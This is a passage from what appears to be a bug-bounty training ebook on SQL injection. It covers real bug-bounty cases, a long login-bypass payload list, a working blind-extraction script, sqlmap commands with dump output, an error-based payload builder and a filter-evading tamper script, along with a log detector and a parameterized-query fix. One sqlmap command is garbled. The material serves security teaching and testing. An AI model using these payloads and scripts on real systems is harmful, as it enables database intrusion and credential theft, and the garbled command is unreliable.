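# parameter, 198.51.100.9 probes the User-Agent as in 18.3.3, 198.51.100.4 is normal traffic.
UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0"
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [12/Mar/2019:09:12:57 +0000] "GET /gallery.php?id=1 HTTP/1.1" 200 5120 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:12:58 +0000] "GET /gallery.php?id=1%27%20or%20length(database())=1%20--%20+ HTTP/1.1" 200 4870 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:12:59 +0000] "GET /gallery.php?id=1%27%20or%20length(database())=2%20--%20+ HTTP/1.1" 200 4870 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:13:02 +0000] "GET /gallery.php?id=1%27%20or%20length(database())=6%20--%20+ HTTP/1.1" 200 5120 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:13:03 +0000] "GET /gallery.php?id=1%27%20or%20substring(database(),1,1)=%27d%27%20--%20+ HTTP/1.1" 200 5120 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:13:04 +0000] "GET /gallery.php?id=1%20or%20if(mid(@@version,1,1)=5,1,2)=2%23 HTTP/1.1" 200 5120 "-" "' + UA + '"',
    '203.0.113.7 - - [12/Mar/2019:09:13:05 +0000] "GET /gallery.php?id=1%27%20OR%20SLEEP(10)-- HTTP/1.1" 200 5120 "-" "' + UA + '"',
    '198.51.100.9 - - [12/Mar/2019:09:20:01 +0000] "POST /api/check HTTP/1.1" 401 12 "-" "Mozilla/5.0\'"',
    '198.51.100.9 - - [12/Mar/2019:09:20:02 +0000] "POST /api/check HTTP/1.1" 200 2 "-" "Mozilla/5.0\' AND \'1\'=\'1"',
    '198.51.100.9 - - [12/Mar/2019:09:20:03 +0000] "POST /api/check HTTP/1.1" 401 12 "-" "Mozilla/5.0\' AND \'1\'=\'2"',
    '198.51.100.9 - - [12/Mar/2019:09:20:04 +0000] "POST /api/check HTTP/1.1" 200 2 "-" "Mozilla/5.0\' and substring(@@version,1,1)=1=\'1"',
    '198.51.100.4 - - [12/Mar/2019:09:21:00 +0000] "GET /search.php?q=coffee+or+tea HTTP/1.1" 200 3300 "-" "' + UA + '"',
])

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

The search for "coffee or tea" produces no hit, which is the point of matching whole function shapes rather than lone keywords; the per-IP threshold is what separates a stray match from the enumeration pattern.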


18.3.4. Time Based SQL Injection - Starbucks Program

Specifically, time-based SQL Injection is similar to Blind SQL Injection. The basic difference in this situation is that the tester has to notice/observe changes in the behavior of the web application's response.

The behavior in question is the "response time" the application takes to answer the requests given to it (such as an injection). For example, a tester injects a payload such as ' OR SLEEP(10)--; when the application is vulnerable, it gives a true result with a response time of ten (10) seconds.

One clear and instructive example of this is when a researcher named toctou managed to find a time-based SQL Injection in the Starbucks-owned program. On that occasion, toctou found that the group_id parameter present on news.starbucks.com was vulnerable to attack, and in the first experiment toctou tried injecting the payload 1'-IF(1=1,SLEEP(1),0) AND group_id='1 into that parameter.

For information, the IF function in the database acts as a condition, with one branch for when something is true and another for when it is false. For example, in the payload IF(1=1,SLEEP(5),0), if 1 equals 1 the true branch is returned, in the form of a SLEEP command for 5 seconds. If the outcome is false, the value returned is 0, which takes only 0.xx seconds.

Returning to the Starbucks case, when toctou entered the payload 1'-IF(1=1,SLEEP(1),0) AND group_id='1, the output should be true and a sleep of 1 second should occur. However, what happened was that the Starbucks application returned its response after 13 seconds.

Figure 191 Attack Trial Time-Based SQL Injection


On that occasion, toctou went on to use another payload, namely 1'-IF(MID(VERSION(),1,1)='4',SLEEP(1),0) AND group_id='1'.

This payload is intended to find out the version of the DBMS used by the application. If the version starts with the character "4", the application should execute SLEEP for 1 second. If not, no SLEEP is produced.

Figure 192 Application did not Sleep

As shown in the picture above, the application did not go into SLEEP, since its response time was only 251 milliseconds, or about 0.25 seconds.

Toctou then tried another payload and found that the version of the DBMS used by Starbucks begins with the character "5". This can be seen from the long response given by the application when he injected the payload 1'-IF(MID(VERSION(),1,1)='5',SLEEP(1),0) AND group_id='1'. In this case, the resulting response time was 13 seconds (remember, do not be confused by the number 13 here, because in this particular case a value of 1 second for true turned out to be 13 seconds. In reality, of course, the delay can be set as expected, for example 1 second).


Figure 193 Found the DBMS Version

Based on the whole trial, he then immediately "carried" the vulnerable request over to an automation tool such as sqlmap, which ultimately led to optimal results.

Figure 194 Time-Based SQL Injection with sqlmap


18.3.5. Simple SQL Injection to Bypass a Login Form - Sample from Mutillidae II

To be honest, this vulnerability is quite rare in the modern applications that exist today. Nevertheless, this guide still includes it to complement the explanations given previously.

PortSwigger, in one of its articles on testing methodology, has presented a way to log into an application by using SQL Injection. As an example, PortSwigger uses the OWASP application Mutillidae II.

Long story short, when a tester discovers a login form, the tester can try to log in with a simple payload like ' or 1=1--.

Figure 195 Sample of Injection at Login Form

In practice, this payload can also be entered into the username and password fields simultaneously.

When the login form is indeed vulnerable, the tester will be able to log in directly to the "target" account.

Figure 196 Success to Login


Why does this happen?

In simple terms, the injected SQL Injection payload is executed by the database in the following form:

SELECT * FROM users WHERE username = '' OR 1=1-- ' AND password = 'foo'

Because of the -- sequence, the part ' AND password = 'foo' is not executed by the database, since the database treats it as a comment (which does not need to be executed). In conclusion, the payload essentially produces the following query:

SELECT * FROM users WHERE username = '' OR 1=1--

Long story short, this query evaluates to true and thus "passes" the login page.
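To see the mechanics above run end-to-end, together with the fix, here is an added example that is not from the book, PortSwigger or Mutillidae. An in-memory SQLite database stands in for the MySQL backend; the users and tb_gallery tables and their rows are constructed for the demo. The login check is built twice, once by string concatenation (the query shape shown above) and once with bound parameters, and the same is done for the gallery lookup of 18.1.3, where sqlite_version() plays the role that database() and user() play in the UNION payload, since SQLite has no such functions.

```python
"""Login bypass and UNION leakage against string-built SQL, beside the parameterized fix.

Added example, not from the book. Schema and rows are constructed for the demo.
"""
import sqlite3


def make_db():
    """Create the demo schema shared by the login and gallery lookups."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        -- plaintext only to keep the demo short; a real system stores password hashes
        INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('alice', 'wonderland');
        CREATE TABLE tb_gallery (id INTEGER PRIMARY KEY, title TEXT, path TEXT);
        INSERT INTO tb_gallery (title, path) VALUES ('Latte art', '/img/1.jpg'), ('Beans', '/img/2.jpg');
        """
    )
    return con


def login_vulnerable(con, username, password):
    """String concatenation: the input becomes part of the SQL grammar, as in
    SELECT * FROM users WHERE username = '<input>' AND password = '<input>'."""
    sql = "SELECT username FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same query with bound parameters: the input is only ever data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def gallery_vulnerable(con, item_id):
    """Numeric value concatenated without quotes, as in SELECT * FROM tb_gallery WHERE id = 1."""
    sql = "SELECT id, title, path FROM tb_gallery WHERE id = " + str(item_id)
    return con.execute(sql).fetchall()


def gallery_safe(con, item_id):
    """Type-check first, then bind; anything that is not an integer is rejected."""
    if not str(item_id).isdigit():
        raise ValueError("id must be an integer")
    return con.execute("SELECT id, title, path FROM tb_gallery WHERE id = ?", (int(item_id),)).fetchall()


def demo():
    """Run both payload shapes from the text against both implementations."""
    con = make_db()
    bypass = "' OR 1=1--"                                     # login payload from 18.3.5
    union = "1 UNION SELECT 1, sqlite_version(), 'leaked'"    # shape of the 18.1.3 payload
    results = {
        "vuln_login": login_vulnerable(con, bypass, "foo"),   # 'admin', no password needed
        "safe_login": login_safe(con, bypass, "foo"),         # None, no such user
        "vuln_gallery_rows": gallery_vulnerable(con, union),  # gallery row plus the leaked version
    }
    try:
        gallery_safe(con, union)
        results["safe_gallery"] = "accepted"
    except ValueError as exc:
        results["safe_gallery"] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The comment marker does the same work in SQLite as in MySQL here: everything after -- is dropped, so the password clause never reaches the engine. With placeholders the quote and the comment are just characters inside a string compared against the username column, and the query returns no row.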

Is there another payload that can be used as an alternative for the injection? The answer is yes. The following is a list of such payloads:

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*


18.3.6. Error Based SQL Injection with Page Redirection - Private Program

Once, the author was testing an application in a private program that had several SQL Injection vulnerabilities associated with the same parameter, but located in different functions. Say that almost every function had a URL of the following form: target.com/path/some_function.php?ParA=xyz&ParB=opq. In this condition, almost all of the parameters could be injected either manually or automatically (and of course automated execution is easier once the vulnerability has been proven).

However, a problem arose when the author noticed one function that was believed to be vulnerable, but each time a payload of the right length was injected, the application redirected to another page hosted on CloudFront.

A simple example of the flow:

• Injecting ' into ParA made the application produce an error.
• Entering the payload ' or length(database())=3 -- + still produced an error (because 3 is not the correct length of the database name).
• Entering the payload ' or length(database())=9 -- + (say the database name is 9 characters long) made the application immediately redirect to the CloudFront page it used. When the author tried to automate the execution with sqlmap, sqlmap considered the parameter not vulnerable.

Starting from this situation, the author finally wrote a simple script to automate the extraction of information about the database. Here is an overview of its flow:

' or substring(database(),1,1)='a' -- +  → No redirect, but still an error → so the character "a" is false
' or substring(database(),1,1)='e' -- +  → No redirect, but still an error → so the character "e" is false
' or substring(database(),1,1)='t' -- +  → Redirect to CloudFront → so "t" is the first character of the database name (true)


And here is the simple script used to automate this:

import urllib.parse
import requests

headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0'}
url = 'https://target.com/path/somefunction.php?ParB=opq&ParA='
cookieWeb = dict(usercookie1='put_the_value_here', AWSCookieHere='put_the_value_here')


def getDBLength():
    # Try lengths 1..49; the redirect to CloudFront marks the "true" case
    for x in range(1, 50):
        payload = "' OR length(database())={} -- +".format(x)
        FinalUrl = url + urllib.parse.quote(payload)
        req = requests.get(FinalUrl, cookies=cookieWeb, headers=headers)
        if req.text.find("CloudFront") != -1:
            return x


def getDBname(length):
    db = ''
    char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
    for x in range(1, length + 1):
        for y in range(len(char)):
            # Compare the character at position x against a hex literal, so no quotes are needed
            payload = urllib.parse.quote("' or substring(database(),{},1)={} -- +".format(x, hex(ord(char[y]))))
            FinalUrl = url + payload
            req = requests.get(FinalUrl, cookies=cookieWeb, headers=headers)
            if req.text.find("CloudFront") != -1:
                print(char[y], end='', flush=True)
                db += char[y]
                break
    print()
    output = '[+] Database: ' + db
    return output


def main():
    x = getDBLength()
    print("[+] Database Length: " + str(x))
    print("[+] Try to get the database name...")
    print(getDBname(x))


if __name__ == "__main__":
    main()


Thus, the purpose of this script is to detect the word "CloudFront" in the application's response, which appears when the injected payload "hits" a true value.

When the script finishes executing, its output is as follows:

root@times:~# python script.py
[+] Database Length: 9
[+] Try to get the database name...
targetxyz
[+] Database: targetxyz

From these results, the database name is 9 characters long and is named targetxyz. (This script can be used when the reader encounters a similar situation in which the parameter is processed via the GET method.)

18.4. Automatic SQL Injection with sqlmap (Basic Use)

In several of the situations presented previously, we saw testers use a tool called sqlmap to make execution easier. On this occasion, the author also wants to give a general picture of how sqlmap is used, which is hoped to help the reader learn.

Quoting from the official page, sqlmap is a testing tool that automates the process of detecting and exploiting SQL Injection vulnerabilities (and, in particular situations, it can also detect Cross Site Scripting vulnerabilities, although not optimally).

In general, this tool has many features that testers can use, such as retrieving the contents of the database automatically (so there is no need to enter the injection queries manually), obtaining shell access without undue difficulty, downloading files (after a successful SQL Injection) without the trouble of remembering the queries needed, support for various DBMS types (such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2), and many more.

Technically, the tool itself can be downloaded from its official GitHub at https://github.com/sqlmapproject/sqlmap. When testers use Kali Linux, this tool is already included, so there is no need to download it again.

18.4.1. How to Use sqlmap

There are two ways of using sqlmap that testers can choose from, namely by supplying all parameters along with the cookies on the terminal (call it the direct command), and by placing the entire HTTP request into a file for automatic processing.

Surely the second way sounds more enjoyable, doesn't it?

18.4.1.1. Basic Concept

Before going further, it is better to understand that the data extraction process of sqlmap is structured as DBMS, Database, Table, Column, and finally Data. Knowing this sequence makes it easier for testers to understand the commands available in sqlmap.

• Simply put, when sqlmap discovers a SQL Injection vulnerability in an application, it first detects the Database Management System in use (such as MySQL, Microsoft SQL Server, PostgreSQL, and others).
• Once successful, sqlmap tries to obtain the names of the databases in use, which can then be followed by extracting the tables contained in them.
• From these tables, the tester can then extract the columns along with the data contained in the related columns.

After understanding this structure, it is translated into sqlmap commands, such as:

• --dbs : to view all databases listed in the DBMS used
• -D pilih_database --tables : to extract the tables in the selected database
• -D pilih_database -T pilih_tabel --columns : to extract the columns in the selected table
• -D pilih_database -T pilih_tabel -C pilih_kolom --dump : to extract the data in the selected columns

18.4.1.2. Using sqlmap via Direct Command

Say a tester has found a SQL Injection vulnerability in the GET method, in parameter X of target.com → target.com/function.php?parX=<vulnerable>

With the manual method, the tester has to enter payloads one by one into parX in the URL. With sqlmap, however, the tester only needs to put an * in parX and then "let" sqlmap continue the execution. Example:

sqlmap -u "http://target.com/function.php?parX=*" --dbs

When it is indeed vulnerable, sqlmap outputs information on the DBMS used as well as the databases that exist in it.

[9:12:57] [INFO] testing connection to the target URL
sqlmap identified the following injection point(s) with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[9:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache 2.4
back-end DBMS: MySQL 5
[9:13:00] [INFO] fetching database names
[9:13:00] [INFO] the SQL query used returns 3 entries
[9:13:01] [INFO] resumed: information_schema
[9:13:02] [INFO] resumed: db_app
[9:13:03] [INFO] resumed: mysql
available databases [3]:
[*] information_schema
[*] db_app
[*] mysql

After getting this output, the tester can of course proceed with:

• Extracting the tables in the database. Say the selected database is db_app; the command is:

sqlmap -u "http://target.com/function.php?parX=*" -D db_app --tables

Output:

---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[9:17:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.x.xx
back-end DBMS: MySQL
[9:17:00] [INFO] fetching tables for database: 'db_app'
[9:17:00] [INFO] the SQL query used returns 2 entries
Database: db_app
[2 tables]
+-------------+
| table_User  |
| table_Level |
+-------------+


• Then, extract the columns in the table that was obtained:

sqlmap -u "http://target.com/function.php?parX=*" -D db_app -T table_user --columns

Output:

---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[9:20:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.x.xx
back-end DBMS: MySQL
Database: db_app
Table: table_users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | varchar(30) |
| username | varchar(70) |
| password | varchar(32) |
+----------+-------------+

• Afterwards, the new followed by extracting the data in column who have successfully

obtained:

sqlmap -u "http: // target.com/function.php?parX=*" db_app -D -T -C table_user

email, username, password --dump

output

---

Parameters: id (GET)

Bug Hunting 101 - First Edition free | https://alfursan.id


Web Application Security Testing Al-Fursan Cybersecurity Learning Resources
Weather | 198

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=51 AND (SELECT 1489 FROM (SELECT COUNT(*), CONCAT(0x3a73776c3a, (SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)), 0x3a7a76653a, FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)

---

[9:20:00] [INFO] the back-end DBMS is MySQL

Web application technology: PHP 5.x.xx

Back-end DBMS: MySQL

Database: db_app

Column: email, username, password

[15 entries]

+------------------+-----------+-----------+
| email            | username  | password  |
+------------------+-----------+-----------+
| email1@email.com | username1 | password1 |
| email2@email.com | username2 | password2 |
| email3@email.com | username3 | password3 |
| email4@email.com | username4 | password4 |
| email5@email.com | username5 | password5 |
+------------------+-----------+-----------+

18.4.1.3. Using sqlmap via a Saved Request File

In short, this method was already covered in the SQL Injection case on the assets of Nutanix; to enrich the discussion, the authors revisit it here with a slightly different explanation.

Say a tester has found a SQL Injection vulnerability in a POST parameter of target.com → target.com/function.php (POST method, parameter parX).

POST /function.php HTTP/1.1
Referer: https://www.target.com
Host: target.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

parX=hello+world

To run the SQL injection through sqlmap, copy the entire request from Burp Suite and save it to file.txt (any text editor will do). Then put an asterisk (*) in place of the value of the parameter you want sqlmap to inject into. The blank line between the headers and the body must be preserved, otherwise sqlmap will not see the POST body.

Here is an example of such a request stored in file.txt (with the parX parameter marked with the asterisk):

POST /function.php HTTP/1.1
Referer: https://www.target.com
Host: target.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

parX=*

Once the request is saved in file.txt, run sqlmap as follows:

sqlmap -r file.txt --risk 3 --level 5 --dbs

Then the tester only needs to wait until sqlmap reports a positive result (if the parameter is vulnerable). Next, the tester runs the same commands as in the previous point (-D --tables, -D -T --columns, and -D -T -C --dump), replacing -u with -r file.txt. Note that --risk 3 adds OR-based boolean tests, which can modify or delete rows if the injection point sits inside an UPDATE or DELETE statement, and --level 5 also tests the Cookie, User-Agent, Referer and Host headers, so expect far more requests than with the defaults (--risk 1 --level 1).
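As an added example (not the book's own material and not sqlmap's code), the following Python script reproduces two things the book only shows the output of: how a saved request with a * marker is turned into the outgoing request, and why the "MySQL >= 5.0 AND error-based" payload in the sqlmap output leaks data. The markers 0x3a73776c3a and 0x3a7a76653a in that payload are the strings ':swl:' and ':zve:'; MySQL's duplicate-key error echoes the offending group key, and the subquery result sits between the two markers. The saved request, the Content-Type header and the error response below are constructed samples; target.com, /function.php and parX are the page's own placeholders.

```python
import re
from urllib.parse import quote

# 0x3a73776c3a and 0x3a7a76653a in the page's sqlmap payload decode to these markers
MARK_START, MARK_END = ":swl:", ":zve:"

# Constructed sample of file.txt: the parX value is replaced by the '*' marker
# (Content-Type is assumed; the page's request does not show it)
SAVED_REQUEST = """POST /function.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

parX=*
"""

# Constructed sample of a verbose MySQL error page leaking the subquery result
SAMPLE_ERROR = "Duplicate entry ':swl:db_app:zve:1' for key 'group_key'"


def parse_raw_request(raw):
    """Split a saved Burp request into start line, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body.strip()}


def error_based_payload(subquery, marker=1489):
    """Same shape as the 'MySQL >= 5.0 AND error-based' payload in the sqlmap output.
    COUNT(*) ... GROUP BY x over a key built from FLOOR(RAND(0)*2) makes MySQL compute
    the same group key twice and raise 'Duplicate entry ... for key group_key'. The
    subquery result is part of that key, between the two hex markers, so it ends up
    verbatim in the error text."""
    return (f" AND (SELECT {marker} FROM (SELECT COUNT(*), CONCAT(0x3a73776c3a, "
            f"({subquery}), 0x3a7a76653a, FLOOR(RAND(0)*2)) x "
            f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)")


def render_request(req, payload):
    """Replace the '*' marker (in path or body) with the URL-encoded payload and rebuild
    the raw request; Content-Length is recomputed so the server reads the whole body."""
    if "*" not in req["path"] and "*" not in req["body"]:
        raise ValueError("no '*' injection marker found in request")
    encoded = quote(payload, safe="")
    path = req["path"].replace("*", encoded)
    body = req["body"].replace("*", encoded)
    headers = dict(req["headers"])
    if body:
        headers["Content-Length"] = str(len(body.encode()))
    lines = [f"{req['method']} {path} {req['version']}"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return "\n".join(lines) + "\n\n" + body


def extract_leaked_value(response_body):
    """Return the text between the markers in a duplicate-entry error, or None."""
    match = re.search(re.escape(MARK_START) + r"(.*?)" + re.escape(MARK_END), response_body)
    return match.group(1) if match else None


if __name__ == "__main__":
    req = parse_raw_request(SAVED_REQUEST)
    print(render_request(req, "hello world" + error_based_payload("SELECT DATABASE()")))
    print("leaked:", extract_leaked_value(SAMPLE_ERROR))
```

The original value ("hello world") is kept in front of the payload, exactly as sqlmap keeps "51" in front of "AND (SELECT 1489 ...)" in the output above; the injection only works while the application still echoes the database error into the response.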


18.4.2. Simple Closing - sqlmap

That concludes a brief walk-through of sqlmap. Of course there are many more features, among them tamper scripts (--tamper), which encode or rewrite the characters of each payload before it is sent, so that the injection still goes through when a filter blocks the plain form.
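As an added example (not part of the book's text, and not one of the scripts bundled with sqlmap), the following minimal tamper script, assumed to be saved as hexquotes.py, shows the interface every tamper script implements: sqlmap imports the file and calls tamper(payload, **kwargs) on each payload it is about to send. This one replaces spaces with inline comments and rewrites single-quoted literals as MySQL hex literals, so the request carries neither spaces nor quote characters. The hex-literal rewrite is MySQL-specific, and escaped quotes inside a literal are not handled.

```python
# hexquotes.py (hypothetical file name) - minimal sqlmap tamper script
try:
    from lib.core.enums import PRIORITY   # available when sqlmap loads the script
    __priority__ = PRIORITY.LOW
except ImportError:                        # standalone run of this example
    __priority__ = 0


def dependencies():
    """Hook sqlmap calls so a tamper script can warn about its requirements; none here."""
    pass


def tamper(payload, **kwargs):
    """Called by sqlmap on every payload. This one:
      1. turns each space outside a string literal into an inline comment /**/
         (the same idea as the bundled space2comment script), and
      2. rewrites every single-quoted literal as a MySQL hex literal,
         e.g. 'admin' -> 0x61646d696e, so no quote character is sent at all.
    Both rewrites keep the SQL semantics in MySQL; (2) is MySQL-specific."""
    if not payload:
        return payload
    out, i = [], 0
    while i < len(payload):
        ch = payload[i]
        if ch == "'":
            end = payload.find("'", i + 1)
            if end == -1:                     # unterminated quote: leave the tail as-is
                out.append(payload[i:])
                break
            literal = payload[i + 1:end]
            out.append("0x" + literal.encode().hex() if literal else "''")
            i = end + 1
            continue
        out.append("/**/" if ch == " " else ch)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    print(tamper("1 AND 'a'='a'"))
    print(tamper("1 AND username='admin' AND password='x'"))
```

Placed in sqlmap's tamper/ directory, the script is selected by name (sqlmap -r file.txt --tamper=hexquotes); several scripts can be chained with a comma, and __priority__ decides the order in which they run.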

18.5. References for SQL Injection

To deepen the understanding of the material presented on SQL Injection, testers can consult the following references:

• Akamai Q4 2017 State of the Internet Security Report

https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-state-of-the-internet-security-report.pdf

• OWASP TOP 10 2017

https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

• OWASP TOP 10 2017 - A1 Injection

https://www.owasp.org/index.php/Top_10-2017_A1-Injection

• SQL Injection Cheat Sheet

https://portswigger.net/web-security/sql-injection/cheat-sheet

• Blind SQL Injection Tutorial:

http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html

• How to Prevent SQL injection Attacks

https://www.wordfence.com/learn/how-to-prevent-sql-injection-attacks/

• What is SQL Injection (SQLi) and How to Prevent It

https://www.acunetix.com/websitesecurity/sql-injection/

• [Nutanix] SQL injection on Bootcamp

https://blog.securitybreached.org/2018/09/08/sqli-bootcampnutanix-com-bug-bounty-poc/

• [Zomato] Boolean Blind SQL injection

https://hackerone.com/reports/297534

• PoC - Blind SQL Injection through Boolean-based User-Agent

https://medium.com/@frostnull1337/sql-injection-through-user-agent-44a1150f6888

• [Starbucks] Time-Based Blind SQL Injection

https://timeofcheck.com/time-based-blind-sqli-on-news-starbucks-com/

• Methodology: SQL Injection Authentication Bypass

https://support.portswigger.net/customer/portal/articles/2791007-Methodology_SQL_Injection_Authentication_.html

• SQL Injection Authentication Bypass Cheat Sheet

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

• sqlmap repository

https://github.com/sqlmapproject/sqlmap

CLOSING OF THE FIRST EDITION

Without noticing it, we have reached the end of this ebook. With this, the first edition of the "Bug Hunting 101" ebook is complete.

There is no power and no strength except through God's help. Only to Allah do we ask for taufiq and His guidance. Praise be to Allah, Lord of the Worlds.

May peace and blessings always be upon the Prophet Muhammad sallallaahu 'alaihi wa sallam, his family, his companions, and those who follow them in goodness until the Day of Judgement.

The authors and the team hope that Allah makes it easy for all of us to develop this ebook into something more comprehensive and complete.

We do not deny that this writing certainly still has many shortcomings and needs much additional information. On that basis, we would be very grateful if readers could also provide feedback and corrections to this writing via e-mail at info@alfursan.id.

LIST OF REFERENCES

0x01. Reconnaissance

• Default Passwords: https://cirt.net/passwords

• Default Password List: http://www.phenoelit.org/dpl/dpl.html

• Reverse IP Lookup: https://www.yougetsignal.com/tools/web-sites-on-web-server/

• Sublist3r - Fast subdomain enumeration tool for penetration testers: https://github.com/aboul3la/Sublist3r

• Amass - In-depth DNS Enumeration and Network Mapping: https://github.com/caffix/amass

• Amass - In-depth DNS Enumeration and Network Mapping (OWASP repository): https://github.com/OWASP/Amass

• Subfinder - subdomain discovery tool that discovers valid subdomains for websites: https://github.com/subfinder/subfinder

• Nikto - Open Source (GPL) web server scanner: https://github.com/sullo/nikto

• Bug Hunter Methodology v3 by Jason Haddix: https://docs.google.com/presentation/d/1R3eqlt31sL7_rj2f1_vGEqqb7hcx4vxX_L7E23lJVo/edit

• [Video] Bug Hunter Methodology v3 by Jason Haddix: https://youtube.com/watch?v=Qw1nNPiH_Go

0x02. Subdomain Takeover

• A Guide to Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers

• Subdomain Takeover Basics: https://0xpatrik.com/subdomain-takeover-basics/

• Broken Link Hijacking: https://edoverflow.com/2017/broken-link-hijacking/

• Subdomain Takeover Proofs (GitHub, Amazon S3, Heroku, and Readme.io): https://0xpatrik.com/takeover-proofs/

• Subdomain Takeover Principles: https://blog.sweepatic.com/subdomain-takeover-principles/

• Subdomain Takeover at Starbucks (via Microsoft Azure): https://0xpatrik.com/subdomain-takeover-starbucks/

• Subdomain Takeover Detection with Aquatone: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/

• Hostile Subdomain Takeover using Heroku, GitHub, Desk and more: https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-heroku-github-desk-more/

• Subdomain Takeover on Jobsycombinator: https://noobsec.org/project/2018-11-06-subdomain-takeover-on-jobsycombinator/

• How an Unclaimed AWS S3 Bucket Escalates to Subdomain Takeover: https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-takeover

• Subdomain Takeover via Unsecured S3 Bucket: https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/

• Subdomain Takeover of blog.snapchat.com (via Tumblr): https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7

0x03. Intercepting and Forwarding Traffic of Web-Based Applications

• Installing Burp's CA certificate: https://portswigger.net/burp/documentation/desktop/tools/proxy/options/installing-ca-certificate

• Installing Burp's CA Certificate in Firefox: https://support.portswigger.net/customer/portal/articles/1783087-installing-burp-s-ca-certificate-in-firefox

• Installing Burp's CA Certificate in Chrome: https://support.portswigger.net/customer/portal/articles/1783085-installing-burp-s-ca-certificate-in-chrome

